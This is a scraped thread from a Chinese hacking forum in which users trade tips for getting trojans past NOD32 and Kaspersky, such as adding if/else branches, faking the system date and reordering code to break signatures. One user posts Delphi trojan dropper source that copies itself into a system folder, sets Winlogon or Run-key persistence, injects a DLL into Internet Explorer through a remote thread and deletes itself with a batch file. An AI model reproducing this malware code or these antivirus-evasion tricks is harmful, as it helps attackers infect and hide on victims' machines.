帖子556 精华[url=http://forum.eviloctal.com/digest.php?authorid=1813]0[/url] 积分1667 阅读权限100 在线时间426 小时 注册时间2005-1-30 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1813]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=71082&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=71082&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-15014.html]dfsy[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 过NOD32??加个IF ...ELSE就过了..过卡巴6.0就用POST SYSTEM TIME 1980..就PASS了..
无意中发现的...
帖子24 精华[url=http://forum.eviloctal.com/digest.php?authorid=15014]0[/url] 积分81 阅读权限40 性别男 在线时间111 小时 注册时间2005-10-14 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=15014]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=73286&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=73286&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-22314.html]caijing28[/url] [img]http://forum.eviloctal.com/images/avatars/pw/kawayi4.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第2楼ch4o.jt于2006-10-23 13:41发表的:
[s:70]
把主代码写成一个过程,然后在后面调用这个过程就OK了。。。
这方法过不了NOD32,它是查杀API函数的~[s:92]
[s:81] 鸽子的代码也一样,如果针对特征码查杀的话,只要打乱一下主代码的顺序编译就OK了...
如果真的从API函数开始杀的话.那不是连WINDOWS一起杀了?hi.baidu.com/zuikee/
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url]
帖子13 精华[url=http://forum.eviloctal.com/digest.php?authorid=22314]0[/url] 积分57 阅读权限40 性别男 来自湖北 在线时间19 小时 注册时间2005-12-12 最后登录2008-1-31 [url=http://zuike.3q5.com]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=22314]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=73532&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=73532&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-60773.html]icexiaoye[/url] [img]http://forum.eviloctal.com/customavatars/60773.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 8是杀API
是针对特殊点的API拦截
然后给用户发出提示玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.
[url=http://wpa.qq.com/msgrd?V=1&Uin=119419178&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子728 精华[url=http://forum.eviloctal.com/digest.php?authorid=60773]4[/url] 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 [url=http://icexiaoye.ch]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=60773]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=73534&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=73534&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-2257.html]烂香蕉[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
是这一段 被杀了!!!
谁有办法解决嚒???
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=2257]0[/url] 积分20 阅读权限40 在线时间18 小时 注册时间2005-2-19 最后登录2008-7-10 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2257]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=74436&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=74436&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-2257.html]烂香蕉[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 // 只要打乱一下主代码的顺序编译就OK了...
也无效
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=2257]0[/url] 积分20 阅读权限40 在线时间18 小时 注册时间2005-2-19 最后登录2008-7-10 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2257]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=74437&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=74437&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-2257.html]烂香蕉[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 program Main;
uses
windows,
RejoiceBase,
SysUtils2,
tlhelp32,
Reg ;
{$L 'SRT.obj'}
{$R RSRC.RES}
{$R 'Down.RES' 'Down.rc'}
const
{ ExeFiles='rejoice.exe';
DLLFiles='rejoice.dll';
//IEFiles ='Explorer.exe';
IEFiles ='IEXPLORE.EXE';}
ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
IEFiles: PChar = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
var
PID: DWORD;
Process: DWORD;
DllAllpath: string;
StartInfo: TStartupInfo;
ProcInfo: TProcessInformation;
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := Gesy + 'Deleteme.bat';
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function RandomFilename(aFilename: string): string;
var
Path, Filename, Ext: string;
begin
Result := aFilename;
Path := ExtractFilepath(aFilename);
Ext := ExtractFileExt(aFilename);
Filename := ExtractFilename(aFilename);
if Length(Ext) > 0 then
Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));
repeat
Result := Path + Filename + inttoStr(Random(9999)) + Ext;
until not FileExists(Result);
end;
function GetProcessID(sProcName: string): Integer;
var
hProcSnap: THandle;
pe32: TProcessEntry32;
begin
Result := -1;
hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if hProcSnap = INVALID_HANDLE_VALUE then Exit;
pe32.dwSize := SizeOf(ProcessEntry32);
if Process32First(hProcSnap, pe32) = True then
while Process32Next(hProcSnap, pe32) = True do
begin
if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
begin
Result := pe32.th32ProcessID;
break;
end;
end;
CloseHandle(hProcSnap);
end;
//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters: Pointer;
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
if Parameters = nil then Exit;
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
{procedure killer;
var
f:textfile;
begin
assignfile(f,ExtractFilePath(ParamStr(0))+'key.txt');
if not fileexists(ExtractFilePath(ParamStr(0))+'key.txt') then
begin
rewrite(f);
closefile(f);
end;
end; }
var
isSetup: Bool;
SetupPathName: string;
begin
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;
Exit;
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
except
end;
isSetup := True;
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
if FindWindow('Rejoice', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); {删除现有的DLL文件}
except
end;
if FileExists(DllAllpath) then {如果删除失败,则改名}
begin
DllAllpath := RandomFilename(DllAllpath);
end;
if ExtractRes('dllfile', 'mydll', DllAllpath) then {生成新的DLL插入文件}
begin
if IEFiles = 'IEXPLORE.EXE' then
begin
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
end;
PID := GetProcessID(IEFiles);
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
InjectLibrary(Process, Pchar(DllAllpath));
end;
end;
if isSetup then
ExtDelMe;
Halt;
end.
再贴一下代码
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=2257]0[/url] 积分20 阅读权限40 在线时间18 小时 注册时间2005-2-19 最后登录2008-7-10 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2257]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=74438&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=74438&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-2257.html]烂香蕉[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]